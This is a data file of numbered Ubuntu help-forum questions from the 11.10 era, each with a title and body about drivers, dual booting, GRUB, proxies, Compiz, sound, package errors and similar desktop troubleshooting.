77399	are there any alternative programs to proteus available ?	i 'm using ubuntu 11.10 on my machine and i want to install some programs such as the windows program `` proteus '' and i ca n't install them on my machine . i searched a lot and a lot for solution but have not found an acceptable answer . i do n't have enough space to install windows beside of linux . i also know that wine can run windows application but it does n't work for me . if any of you know alternative program for proteus . i would appreciate that .
77405	monitor shows up as unknown on a dell d630	am a newbie on ubuntu and have tried to get my graphics working with ubuntu oneiric without success . my monitor is unknown i have installed all ubuntu preffered drivers but nothing has changed yet . my video player has green pictures my monitor unknown compiz effects dont work my specs are ; nvidia quadro nvs 135m i have also tried to install manually the .run drivers from nvidia without success .
77406	how to uninstall non dependency packages ?	how do you find all packages that were manually installed which are not a dependency of any other installed packages ?
77408	is 32-bit or 64-bit recommended for me based on my experience ?	so i 've tried out the 32-bit ubuntu 11.10 on my laptop . my knowledge with ubuntu ( and linux in general ) is fairly limited . so i want to try the os on my desktop . which is recommended based on the experience i mentioned ? main system specs as well : 4gb ram ati radeon hd 5670 1gb amd athlon ii x2 250 p.s . i 'm considering using the wubi method . to clarify as part of a comment i mentioned below , i have had little experience with linux before 11.10 ( i believe it was with 6.11 ) as well as a linux terminal interface from 2 of my routers . as i 'm trying to slowly learn my way around linux , my concern itself is if i run 64-bit and screw something up because i did n't know , as an example , an app was n't made for 64-bit was the issue at hand .
77412	how to move my home-directory ?	i have three partitions on my netbook : ntfs with windows 7 ext 4 with ubuntu 11 and fat32 for my private data on the fat32-partition ubuntu und windows 7 should share my private data . how could i move my home directory with the exiting files to the fat32-partition ? and how do i mount this partition permanently as my home-directory ? many thanks for an helpful answer .
77415	disabling touchpad	i have a dell inspiron computer . i installed ubuntu 11.10 . i do n't want to use its touchpad but i could not disable it . gconf-editor can not be useful because touchpad is not seen in peripherals although it is properly working . what should i do ? my hardware : alps touchpad for inspiron n5110
77422	how to force windows to start centered ?	how can i force all windows to start centered ( excluding dialogs ) . i can use compiz 's place windows > fixed window placement > fixed placement mode for a specific window ( e.g . class=gnome-terminal ) , but how do i match all windows but dialogs ?
77423	how can i get java apps to follow compiz window rules ?	i 've noticed that compiz fails to set window rules on many ( if not all ) java applications . for example , i want to start phpstorm on second desktop , so i add a rule to place windows > windows with fixed viewport : class=phpstorm ( i actually grab the classname ) , but it just start on active desktop , not the one i 've specified . is there some workaround for this ? p.s . it works fine for class=firefox and class=gnome-terminal
77425	are there any unity 2d related error logs that could help identify a crash ?	i was connecting to a remote laptop using freenx and a gnome classic session . after upgrading to 11.10 on the laptop i am now using unity 2d . sometimes while working on the nx session , the session will suddenly terminate . since the main change was from classic gnome2 to unity 2d i am afraid that unity 2d is crashing . are there any logs related to the gnome-session/unity 2d likely used for errors logging ?
77432	installing 11.10 on fresh virtualbox client hangs - how to debug ?	i am trying to create an 11.10 virtualbox client using the same dvd i used to upgrade my host system . ( it happens to be the alternate dvd iso . ) however , it keeps hanging when the progress bar reaches about 70 % . the last command above the progress bar is log-output -t ubiquity laptop-detect but this appeared much earlier in the process ( the progress bar keeps going and only hangs later ) . by searching for symptoms i eventually found out what my specific problem was ( see below ) , but i still do n't know how to find an error message while i 'm busy installing on a fresh virtualbox . are there logs i can access , a command-line mode i can switch to , or some other means of finding a report of what is going wrong , assuming there is one ? ( if it is not possible to do so , please provide some kind of authoritative reference confirming this . )
77434	problems when using access point	i recently bought a sitecom wireless network access point 300n wl-331 . it 's very easy to install . i tested the connection by connecting from 2 different laptops running windows 7 ( everything went fine ) , then i tried it with 2 android devices ( again everything went fine ) . now it was time to try using the ap from ubuntu 11.10 . ( one of the laptops run on dualboot ) . since i boot into ubuntu 95 % of the time , it 's essential that this works . i tried connecting , it worked perfectly . all pages load fast , i did a speed test and i get 47mbps download ( my isp provides 50mbps so that 's good ) once i added some security to the ap ( wep key ) some problems came up on my ubuntu machine : when i connect the first page displays fast ( google.com ) but it keeps on loading after that when i try loading any other page it takes ages ... : ( if i reset the ap and leave it unprotected , everything is nice and fast . i also tried adding a wpa protection but the same problem keeps occurring . edit : wireless card : intel link 5100 anyone got an idea ? ps : after adding a protection , i tried again on the windows machines + android devices and they run like they were running before so i 'm guessing it 's an ubuntu issue . thanks in advance !
77436	no graphics card recognition	ubuntu does n't seem to recognize the graphics card on my new samsung rv515 . in desktop preferences i can not chose widescreen resolution ( or any alternative resolutions , actually ) . i saw some supposed solutions posted online , but i can not use the descriptions because they 're written in pure ubuntu-slang . i need a step-by-step guide , for a ubuntu newbie .
77437	how to change primary monitor permanently ( with ati driver ) ?	how can i change the primary monitor in ubuntu 11.04 permanently in dual-monitor mode using the ati-driver . i succeeded to change it with this command : xrandr -- output dfp2 -- primary but i have to perform this command after every login .
77438	how can i change the window movement key when using unity 2d ?	the default window movement key ( alt ) conflicts with several programs that i use fairly often . i 'm sure some users find this key binding useful but i really need to change it to something else so that i can be productive . i looked in the most logical place : system settings > keyboard > shortcuts ( tab ) > windows while there is a 'move window ' item listed it appears to be an additional way to move windows . where can i change the key that is bound to the following combination : depress ( and hold ) alt key + left mouse button click i 'm using unity 2d with metacity . the compiz plugin solution referred to in similar questions will not help me . here is a screenshot of the old 11.04 window preferences illustrating what i 'm trying to do :
77439	how to add windows 7 loader to grub ?	i 've successfully installed ubuntu 11.10 alongside windows 7 . during installation i 've manually changed the windows partition size ( there were 24gb used , i 've changed virtual partition size from 100gb to 40gb ) and killed the 150mb partition where windows stores system recovery data . i 've installed ubuntu on second virtual partition . so now when the grub starts it can not see the windows installer . i think it 's all ok with windows loader , just grub does not know about it . so i need to specify it manually . where and how ?
77444	how to synchronize entire thunderbird profile with ubuntu-one ?	is it possible to synchronize the entire thunderbird profile folder with ubuntu-one ( or sparkleshare ) ? or will i have some serious problems doing that . is there anybody out there having experiences with this ?
77445	samsung rc418 still boots into windows after installation of ubuntu	installed ubuntu 11.10 on my samsung rc418 laptop . it said it installed successfully but when it rebooted it defaulted to windows and it did n't give me the option to choose an os . please help me since i 'm a first time user .
77449	how to configure proxy authentication to work with ubuntu software center ?	i have tried put in apt config acquire : :http : :proxy , and in network > network proxy with and without user : password @ server : port and using environment variables http_proxy and https_proxy . nothing seems to work , not even a single proxy authentication popup window . the only proxy configuration working is within firefox edit > preferences > advanced > network > connection > settings > manual proxy configuration . using gconf to manually set the proxy does n't work using synaptic in previous ubuntu versions was too simple .
77450	questions regarding kernel multitouch input driver	i 'm developing a linux kernel driver for a multitouch device . i have used as start point the usbtouchscreen driver included in linux-3.0 kernel source . altough i can already make my mouse pointer move with touch there still a lot of questions that still arise : when properly configured will xinput list my device as mulitouch device ou touchscreen ? the only thing i got so far was listed in virtual core pointer category how should i properly configure and setup input device ? this is how i am making : /* for single touch */ input_set_abs_params ( input_dev , abs_x , 0 , 6300 , 0 , 0 ) ; input_set_abs_params ( input_dev , abs_y , 0 , 6300 , 0 , 0 ) ; /* for multi-touch */ input_mt_init_slots ( input_dev , 6 ) ; input_set_abs_params ( input_dev , abs_mt_touch_major , 0 , 0xff , 0 , 0 ) ; input_set_abs_params ( input_dev , abs_mt_position_x , 0 , 6300 , 0 , 0 ) ; input_set_abs_params ( input_dev , abs_mt_position_y , 0 , 6300 , 0 , 0 ) ; how should i properly inject touches ? in linux multitouch input protocol it says the following : the protocol is divided into two types , depending on the capabilities of the hardware . -for devices handling anonymous contacts ( type a ) , the protocol describes how to send the raw data for all contacts to the receiver . for devices capable of tracking identifiable contacts ( type b ) , the protocoldescribes how to send updates for individual contacts via event slots . what means anonymous contacts ? my device sends raw data and my tracking is made on the kernel . by the time i 'm about to inject touches in the kernel subsystem i have already touches identified and tracked . what is after all my device type ? regardless , i have already tried the two types of reporting and non seem to give me multitouch input . this is how i 'm doing right now : if ( touchactive ) { input_mt_slot ( usbtouch- > input , touch- > id ) ; input_mt_report_slot_state ( usbtouch- > input , mt_tool_finger , true ) ; input_report_abs ( usbtouch- > input , abs_mt_touch_major , 128 ) ; input_report_abs ( usbtouch- > input , abs_mt_position_x , touch- > reportedposition.x ) ; input_report_abs ( usbtouch- > input , abs_mt_position_y , touch- > reportedposition.y ) ; touch++ ; } if ( touch > 0 ) { input_report_key ( usbtouch- > input , btn_touch , true ) ; input_report_abs ( usbtouch- > input , abs_x , touch- > reportedposition.x ) ; input_report_abs ( usbtouch- > input , abs_y , touch- > reportedposition.y ) ; input_sync ( usbtouch- > input ) ; } how can i test user side multitouch input ? i 'm trying to see if xinput lists my device as a multitouch device . no success . i 'm also trying an example from qt4-demos , finger paint which always gives me nothing . is there any `` oficial '' tool for ubuntu multitouch input testing ?
77452	unable to fix brightness in dell n5110 ?	want to control the brightness ( which is by default set to 100 % ) . i want to lower it down because its killing my battery life and drains it out in matters of seconds . i can not control the brightness using fn keys and other control provided in backtrack 5 o/s . information : ubuntu description : ubuntu 10.04.2 lts release : 10.04 codename : lucid model inspiron n5110 kernel linux bt 2.6.39.4 lsmod | grep dell : dell_rbu 5691 0 dell_wmi 1413 0 sparse_keymap 3194 1 dell_wmi dell_laptop 7700 0 wmi 8772 1 dell_wmi dcdbas 5557 1 dell_laptop rfkill 14987 3 dell_laptop , cfg80211 , bluetooth
77453	how to pin a note in tomboy app indicator ?	is there a way to pin some notes in tomboy 's app indicator so that i do n't have to open the main window every time i 'm looking for one specific note i read regularly ? it used to work before unity because it was n't an app indicator but a panel applet . do i have to install some package or file a bug ?
77456	how can i stop unity 2d intercepting meta key when i 'm in virtualbox ?	whenever i 'm working in virtualbox guest system and pressing meta key ( aka winkey , or mod4 ) a huge unity menu pop ups . is there any way to fix this behavior ?
77459	how to limit/control evolution imap to not download mail attachments bigger than x bytes ?	is there a way to limit or control evolution imap to not download attachments that are bigger than x bytes ?
77460	bugzilla stopped working after upgrade to 11.10	i have had a working version of bugzilla on 10.04 . after i upgraded to 11.10 ( _ > 11.04 - > 11.10 ) now bz is not working . while trying ./checksetup.pl i get a gdlib error . trying to solve it with : ./install_module -- all throws this error : **unrecoverable error** could not find gdlib-config in the search path . please install libgd 2.0.28 or higher . if you want to try to compile anyway , please rerun this script with the option -- ignore_missing_gd . trying to use the -- ignore_missing_gd as suggested gives the same error . neither apt-get install libgd2-xpm apt-get install libgd2-noxpm solve it . will appreciate assistance .
77462	having problems detecting my android phone	i have an a3 phone from thailand , when i connect it to my pc running windows it prompts me to install the driver to make it work properly . however , when i use my ubuntu 10.10 there is an error detecting the device but i 'm able to charge it . is there a way i can make it work with ubuntu ?
77468	how to install php 5.3.8 and mysql 5.5 ?	what is the best way to install mysql 5.5 with php 5.3.8 ( latest version ) ? as most of common repositories have only older versions .
77473	how to load mouse driver/support in text tty terminals ( ctrl+alt+f [ 1-6 ] ) ?	i launch some text mode program ( which accepts mouse input , like mc ... ) in text terminal and want to be able to use my mouse . is there some command i should enter to enable mouse support in this text terminals ?
77475	i encountered a gconf2 error while installing some packages , what should i do ?	i got this error when installing some software : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gconf2 ( 3.2.0-0ubuntu1 ) ... i/o warning : failed to load external entity `` /usr/share/gconf/schemas/compiz-wobbly.schemas '' failed to open `/usr/share/gconf/schemas/compiz-wobbly.schemas ' : no such file or directory i/o warning : failed to load external entity `` /usr/share/gconf/schemas/gwd.schemas '' failed to open `/usr/share/gconf/schemas/gwd.schemas ' : no such file or directory dpkg : error processing gconf2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mutter-common : mutter-common depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing mutter-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libmutter0 : libmutter0 depends on mutter-common ( > = 3.2 ) ; however : package mutter-common is not configured yet . libmutter0 depends on mutter-common ( < < 3.3 ) ; however : package mutter-common is not configured yet . dpkg : error processing libmutter0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-mutter-3.0 : gir1.2-mutter-3.0 depends on libmutter0 ( > = 3.1.92 ) ; however : package libmutter0 is not configured yet . dpkg : error processing gir1.2-mutter-3.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-shell : gnome-shell depends on gir1.2-mutter-3.0 ; hno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already owever : package gir1.2-mutter-3.0 is not configured yet . gnome-shell depends on libmutter0 ( > = 3.2.1 ) ; however : package libmutter0 is not configured yet . gnome-shell depends on gconf2 ( > = 2.28.1-2 ) ; however : package gconf2 is not configured yet . dpkg : error processing gnome-shell ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : gconf2 mutter-common libmutter0 gir1.2-mutter-3.0 gnome-shell e : sub-process /usr/bin/dpkg returned an error code ( 1 )
77479	ca n't get mysql workbench to work	i 've installed ubuntu 11.10 and ca n't seem to get mysql workbench to work . i have tried installing both versions from the website by downloading the .deb files for ubuntu 10.04 and 11.04 , but both give the same problem . the problem i get is when i click on a connection , it asks for a password and that 's it , it just displays a never ending `` please wait . from the terminal , i used to create a tunnel using the command : ssh -l 3306 : localhost:3306 username_here @ ip_address_here but then i discovered mysql workbench for ubuntu 10.04 and it worked perfectly . i just ca n't get it to work on 11.10 .
77480	are there any applications to manage sms messaging on an android from ubuntu ?	i have an android phone because i 'm awesome . i would like to be more awesome though . i would like to be able to send and receive text messages ( sms/mms/etc ) from my desktop when i 'm near it , mainly because it 's faster and it means i do n't have to fish around in my pocket every time it vibrates . samsung has an app called kies air which is basically a little web server you run on your phone and connect to via a desktop browser . like most samsung software i 've had the displeasure of using , it 's pap . slow and unreliable . it also requires a certain amount of me pressing buttons on my phone to get working too , so less than ideal . so i was wondering if there was a better solution out there for ubuntu , ideally not requiring me to root the phone , that lets me manage , view and send messages .
77481	velvet screen after grub selection	after a fresh install of ubuntu 11.10 64-bit , the boot seems to stop after selecting the ubuntu option ( same with the rescue one ) in the grub menu . at first i thought this was related to grub-efi , as i 've had similar problems after a ubuntu 11.04 update which replaced grub-efi with grub-pc and got me stuck on a `` elf magic '' grub console ( https : //bugs.launchpad.net/ubuntu/+source/apt/+bug/800910 ) . while the 11.04 problem was resolved with a simple chroot and apt-get install from the live cd , that solution does n't work this time . the drive with the bootloader is a sata3 ssd with 64 gb gpt ( sdb1 20 mb efi boot partition fat16 , sdb2 60 gb root ext4 and sdb3 4 gb swap ) on a msi e350ia-e45 mainboard with a pair of 2 tb ext4 mbr drives for photos/music/movies . i 've tried a few grub-install/update-grub with boot-directory sdb1 from chroot , but i cant seem to go anywhere . even this guide : http : //en.gentoo-wiki.com/wiki/grub2 # efi ( ofc i replaced grub2 with grub in the grub-install and efibootmgr commands ) doesnt seem to get me anywhere . any help or ideas are appeciated ; ) edit : i guess its the combination of gpt/uefi that also seems to haunt f16 edit : same with 12.04 beta btw
77482	how to enter every directory in current path and execute script	i want to enter every directory retuned by ls command and execute script . i tried this ( and many other things ) , but it just does not work ls | awk ' { print $ 1 '' & & pwd '' } ' | xargs cd how to do it without for loop ?
77487	how to fix 'check your internet connection ' error in software center ?	i have a problem with the software center . i am not able to install anything from it . after i entered my authorisation password it gives the following error : failed to download package files check your internet connection . after that it says requires installation of untrusted packages . the action would require the installation of packages from not authenticated sources . i have my internet connection , and i 'm working with that .
77494	laptop built-in speakers not working on an hp 625	after i did a fresh install of 11.10 but keeping my home folder which was used for 11.04 , my laptop speakers didnt work anymore . sound from analog headset still works , but would like to use my speakers also . my laptop is the hp625 and the soundcard : card : hda ati sb ( radeon hd 4200 ) chip : idt 92hd88b1 i have tried the following things : followed this answer and changed some kernel settings : fast video playback with no sound unmute the speakers ran the troubleshooting guide of ubuntu , which caused more trouble than it solved , all my sound stopped working and had to reinstall the kernel , so it would recognize my soundcard again as a reference this is the aslascript , which may provide a linux/ubuntu guru more info than me : alsa information script
77503	how to install gvim ?	i have done the following : sudo apt-get install vim-gnome but i get the following : vim-gnome : depends : libruby1.8 ( > = 1.8.7.352 ) but 1.8.6.111-2ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . i 've done : sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade contents of my /etc/apt/sources.list file : deb http : //us.archive.ubuntu.com/ubuntu/ oneiric main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric main restricted deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted deb http : //us.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb http : //us.archive.ubuntu.com/ubuntu/ oneiric multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse deb http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb-src http : //security.ubuntu.com/ubuntu oneiric-security main restricted deb http : //security.ubuntu.com/ubuntu oneiric-security universe deb-src http : //security.ubuntu.com/ubuntu oneiric-security universe deb http : //security.ubuntu.com/ubuntu oneiric-security multiverse deb-src http : //security.ubuntu.com/ubuntu oneiric-security multiverse but all to no avail . i always get the same error above . what can i do to resolve ?
77506	how can i make the temperature visible in indicator-weather in lubuntu ?	i 've got lubuntu 11.10 with indicator-weather installed , but indicator-weather does n't show the current temperature . resizing the panel does n't work , and the application is n't shown in the panel preferences . how can i make indicator-weather show the temperature ?
77508	unable to dual boot vista and ubuntu	i am trying to dual boot old vista with new ubuntu 11 10 . i have done many things and arrived at the point where it will boot only to a grub > prompt where it stalls . i am able to run the ubuntu live cd but i can not enter vista ( as i recently could ) even after a repair with the installation vista disk . that is to say that now windows repair does not work . while i have never been able to dual-boot as i should on this laptop , i was able to boot into windows vista while i was playing around with easy bcd and almost every other command i could find . the most recent and immediate thing that i did was to use a systemrescuecd . http : //www.sysresccd.org/main_page that was supposed to solve all my problems . i ran each of the various options without benefit . i read that wiping the entire hard drive and reinstalling windows may not affect the boot loader . is it correct that there boot codes somewhere on hardware affecting the boot process that i can not change by wiping , format , repartitioning and installing windows ?
77509	how do i set a global socks proxy in xubuntu ?	i saw a similar thread here , but this does n't specify how to specify a socks proxy globally . in vanilla ubuntu there was a proxy configuration program that affected the entire system . is there something similar in xubuntu ? if not , is there a way to manually configure this ?
77512	how do i turn off the border around unity launcher icons ?	is there a way to turn off the boxes around the icons in unity ? clarification : i do not mean the backlight color -- there are plenty of questions about turning that off . i want the icons , and just the icons , to appear in the unity bar , without any lights and shadows and borders . can this be done ?
77515	how can i automatically change the system keyboard layout when plugging in an external keyboard ?	i have a us-style laptop , which is fine , but i also have a uk-style ergonomic usb keyboard . as such i usually have the us key layout set , but when i settle in at my desk and use the uk usb keyboard i find myself making stupid mistakes on symbols ( normally a pretty good touch typist on either ergo or standard kbd ) . can anyone think of a clean way of setting the keyboard layout based on the inferred layout/usbid of any plugged in keyboard ? even having a custom setting such as adding a specific usb id to a runtime script that checks if its plugged in or not . can this be done without the user having to logout/in ? i remember doing something similar with xorg.conf , but that required logout .
77522	command to unmute and maximize volume ?	i need to mute/unmute from the command line . i found out that i can do it with : amixer sset master mute amixer sset master unmute the problem is that the command for unmute is not working ( as described also in this bug report : https : //bugs.launchpad.net/ubuntu/+source/alsa-utils/+bug/878986 ) my question is : is there another way to obtain the same result , taken that amixer is not working ? furthermore , if i set manually the volume to minimum and then call amixer sset master 100 % the volume increases but does n't switch to maximum , even if the stdout tells : simple mixer control 'master',0 capabilities : pvolume pswitch pswitch-joined penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 0.00db ] [ on ] front right : playback 31 [ 100 % ] [ 0.00db ] [ on ] can anybody help me with this ?
77523	dual screen notifications	i just finished upgrading from 10.04.3 lts to 11.10 . on 10.04 whenever i got a message on pidgin or skype a notification would drop down from the time area with a preview of that message . i am using two screens and it would normally appear on the left screen only . now on 11.10 the notification appears on my right screen which is mainly meant for my vm . how can i change that drop down bubble to be on the left . p.s . is there a way to remove the top panel bar from both screens ?
77525	my zte ac 8700 usb modem is not recognized . what should i do ?	i am a new user to ubuntu . i have seen ubuntu on youtube got attracted , so i installed it on my acer aspire one happy 2 netbook as a software in win 7 starter . everything is good , but when comes to the internet connection , i am facing a severe problem , in that my ubuntu is not recognising or supporting the usb modem ( provided by zte ac 8700 model of bsnl in india ) . can any one tell me what to do ? i have searched in some sites , and all are providing codes . i am just beginner and not a technical person , so help me in a way that i can understand .
77526	unity 2d icons in upper-right , click-and-hold	i 'm not sure if this is a bug or by design . i just recently installed a clean 11.10 ( well , preserving my old home partition from 10.10 ) . for the icons in the upper right ( for me , dropbox , sound , network-manager , etc ) , i need to click and hold all these icons in order to keep them open . for example to log out , i click the `` power '' icon and when i release , the menu goes away . i have to press , hold , and then release on the `` log out '' item . if this is a bug , how can i help file ? if this is configurable , how do i configure it ? i 'm not sure what the default experience should be .
77544	ca n't connect ftp with filezilla	i ca n't connect with any ftp server and i try with others clients and with fireftp and i have not any problem
77552	tearing intel hd 3000 with ubuntu 11.10 ( amd 64 )	good evening , i have a problem to eliminate the annoying `` tearing '' of my current video card intel hd 3000 ( sandy bridge cpu ) . installing ubuntu 10.11 ( amd64 ) the bug is now known ( but does not seem resolved ) is solved using unity - compiz ( the solution is here : screen tearing in 11.10 with intel graphics 11-10-with-intel-graphics ) , but i have no solutions for the gnome shell . thanks
77554	how can i use gnome-terminal in qt creator ?	i can adjust the settings to use a terminal rather than just plain output . however , i ca n't seem to figure out the correct command to input for using gnome-terminal . i can use 'xterm -e ' , a fine enough solution , but i figured i 'd like to know anyway . when i try to use 'gnome-terminal -e ' , running my program will result in a blank terminal quickly opening and closing . i have to 'break ' the execution afterward ( sort of like an infinite loop ) . when using 'gnome-terminal -x ' i get : can not connect creator comm socket /tmp/qt_temp.h17333/stub-socket : no such file or directory
77559	how do i get gcc installed without a network connection ?	i have a fresh install of kubuntu 10.04.3 on a new motherboard . the driver ( s ) in the install do not support the intel 82579v nic on the motherboard . i 've located and downloaded the nic driver - but of course that requires a compiler to build/install . there does not seem to be any version of gcc installed by the distro cd . is that correct ? ( seems odd at best to me . ) i 've found gcc .deb files at archive.ubuntu.com and https : //launchpad.net/~ubuntu-toolchain/+archive/ppa . however the process of downloading ( via another computer of course ) a bunch of separate/dependent .deb and installing separately is error-prone . also i am not sure which version of compiler i need . can anyone suggest the simplest way to do this ? update : per user606723 's suggestion , i tried using the cd . i uncommented the cdrom line at the top of sources.list . then apt-get install build-essentials resulted in a 'no package found ' message . apt-get install gcc offered to install 42mb of packages , but failed to find any of them on the cd update_2 : i can see the .deb files on the cd via dolphin file manager . the path appears to be the same as the apt-get error messages . also the build-essential ( note no trailing s ) package is there . however it fails with file not found errors also . update_3 : tried rebooting with cdrom out , then apt-cdrom add apt-get update apt-get install build-essential result is same file not found errors . also tried navigating with dolphin to the build-essential .deb on the cd and clicking . brings up package installer , which ultimately fails trying to get the first file ( probably same underlying error ? ) . solved : based on this bug report : https : //bugs.launchpad.net/ubuntu/+source/apt/+bug/602945 i added a symbolic link from /media/apt/pool - > /cdrom/pool and now the apt-get install works .
77562	how to install ubuntu in android tablet ? can i remove the android os from the eee pad transformer ?	i bought android asus eee pad transformer and i do n't like this os . it 's all hidden how linux should be . how do you remove the existing os , there is no jack such as usb nor it has any boot menu nor it has bios it just after power on . it shows android . any idea how to install in this now ? ( e.g : how to root your asus eee pad transformer )
77567	movie from tiff pictures	how can i create a movie from multiple tiff files in ubuntu ? i have multiple tiff picture files and i want to merge them into a movie . each picture should show for about 0.1s . the final movie format is not relevant and no fancy transitions are reauired .
77591	how to get wireless working on lenovo b575	i need help enabling wireless on lenovo b575 . ubuntu 11.5 sees it on install but never enables it . any help will be appreciated . i have installed compat-wireless-2011-11-07 but it errors out on ethernet portion . i have the ralink 3090 .
77597	is there any way to stream ubuntu one cloud music to xbox 360 ?	i want to listen to the music i uploaded to my ubuntu one music account on my xbox 360 . the windows streaming is ok , but it does n't always work .
77606	system resets when selecting `` install alongside windows vista ''	i have a pretty weird problem with ubuntu 11.10 . i am using a live cd of it to install it alongside vista , but when i click on `` install alongside windows vista '' , it just resets . i 've tried installing ubuntu 11.10 before , but it gave me a black screen after booting my laptop up and choosing ubuntu from the grub menu , so i deleted it 's partition and now i 'm trying to install it again . what should i do ?
77608	java - could not find the main class	when i try to run a simple hello world program using i keep getting a message saying could not find the main class . i found this thread : http : //ubuntuforums.org/showthread.php ? t=1163850 but it was no use . any ideas ? in the thread it says that my classpath variable is messed up . does anybody know a fix or a workaround ? thank you .
77610	how do i convert wma files to ogg ?	i have installed `` sound converter '' but i keep getting an error when i try to use it . it first tells me that i need a plugin that is not installed ( so i have it search ) then it reports `` failed to download repository information '' . i am able to install other software in the software center so what is wrong ?
77613	shutdown and reboot is causing logout	while i am trying to reboot or shutdown my system using the menu , i am again routed to login page . from the login page i am able to shutdown or reboot the system . i have tried the command line and it is working fine . i have install the latest ati drivers ( 9.10 ) manually in my system . please help me to resolv this issue .
77619	the screen is scrambled on fresh 11.10 installation	i got recently a new machine with a fresh windows7 installation . i want to install ubuntu alongside windows . at first i ran wubi installation . when it completed and i tried to boot into ubuntu , i was presented with a colorful assortment of dots on the screen colored generally in the ubuntu color palette . switching to the textual prompt seemed to work . without thinking too much about why that happened , i blamed windows and wubi ( an old instinct ) . so i decided to make a `` real '' installation ; i.e. , run the installation from a cd and partition my disks . after doing that , i got almost to the same result . actually the installation froze at about 90 % . i waited for about 40 minutes without the progress bar moving . the mouse was active and i could explore the menus in the upper right corner . after that i switched to a textual session and typed sudo shutdown -r 0 . after the reboot i got again the fuzzy dots . i get this screen almost immediately after grub . i do n't even see the loading screen . any ideas how to solve that ? my system is intel i5 with 8gb ram and nvidia gtx570 . iso image md5 is correct and the cd was verified after the burning .
77625	does ubuntu have onboard support for dual video	i am looking to buy a graphics card so i can get dual monitors for my desktop . do i need a specific card or will any graphics card have onboard support ?
77626	archive mounter with natilus	i have one problem . i have many iso file and my iso file include many vido file ( education vido , personel video etc ... ) already . when time i use archive mounter then vlc medya player ca n't open vido file and give `` vlc could not read the file. `` eror and if i use totem player open file but i am ca n't use totem player time bar . if i copy vido file my master disk or usb disk then i can open this file vith vlc and i can use totem player time bar .
77633	gtk unthemed and ugly over nx	i just installed nx-server on a fresh installation of ubuntu 11.10 . i 've also followed the instructions as in using nx with unity in 11.10 to specify the session i want to be loaded . it works all right , and i can play with unity-2d or with gnome-classic by just changing the setting of the nx-client . there is just one glitch remaining , that is that , regardless of the session launched or the theme chosen in system settings , the gtk controls are un-themed , and are just plain ugly . it 's like when gnome-settings-daemon is not running if you know what i mean ( yes i checked it was running ) . the picture posted in the question before mentioned ( although showing a different problem ) explains it all . any possible fix ?
77636	getting compiz to work with ubuntu 11.10 and fglrx	i am trying to get compiz to work in ubuntu 11.10 . i have fglrx installed and the `` additional drivers '' screen seems to report that fglrx is active and currently in use . i have tried using ccsm to enable the desktop cube . it seems to be enabled , yet i can not get the affect , or any of the other compiz affects ( e.g . wobbly windows ) to actually happen . i would also like to get the scale plugin work . my questions are : what do i need to do to make sure that fglrx is running ( i have an hp dv7 laptop with both intel and ati graphics ) ? once the graphics are setup correctly , what do i do to get the desktop cube and the scale addon to actually work ? thank you for the help . update stevejb @ telegraph : ~ $ glxinfo | grep direct x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 155 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 update reinstalling the open source ati drivers seemed to fix the problem . all is working now .
77642	is there a way to enable the keyboard numblock ?	my habit is to use the numblock on my keyboard if i have to type in numbers . is there a way to enable the numblock in ubuntu 11.10 ?
77644	downgrade ubuntu 11.10 to older release ( 8.10 )	is it possible to preform a full downgrade ( not a reinstall ) of ubuntu ? the reason is that i can not get internet to work in a full installation ( from livecd ) for 8.10 intrepid . i am thinking that since i will be downgrading , ubuntu will keep/restore my settings completely after downgrading ubuntu , therefore , i think i will be able to get internet working with 8.10 . thanks !
77648	how do i modify the unity global menu	i got some help with part of this question : how do i modify the message notifier widget in the unity global menu ? but i 'm wondering more broadly if there is a tool to tweak the unity global menu . with a gnome panel i used to be able to right click and get the options right there . in unity i ca n't see a way to access any options . where are they ? i 've looked at list of application indicators and how to hide items in unity 's top panel ? -- is there really no centralized management for this menu ?
77650	monitor sometimes displays `` no signal detected '' on an hd4200	i 'm using the default drivers ( mesa ? ) installed by default in ubuntu 11.10 . the problem is that in sometimes the monitor image is unstable and when the system turn on the screensaver , the monitor display `` no signal detected '' and i have to reboot the machine pressing the reset button . i tried to update the drivers with the ppa http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu but the problem persists . i 'm using ubuntu 11.10 and my video device is an amd hd4200 . i do n't want to install the propietary drivers cause the bad performance ( i had to reinstall ubuntu 11.10 because that ) 多any solution ? thanks in advance and sorry for my bad english : )
77651	clarify ubuntu one sync behavior	i 'm seeking clarification of ubuntu one behavior with regard to syncing folders . here 's what i 'm experiencing : ~/ubuntu one syncs to the web site and to all machines that share the u1 account . other synchronized folders ( i.e . not ~/ubuntu one ) sync to the web site , but not to other machines that share the u1 account . is this the expected behavior ?
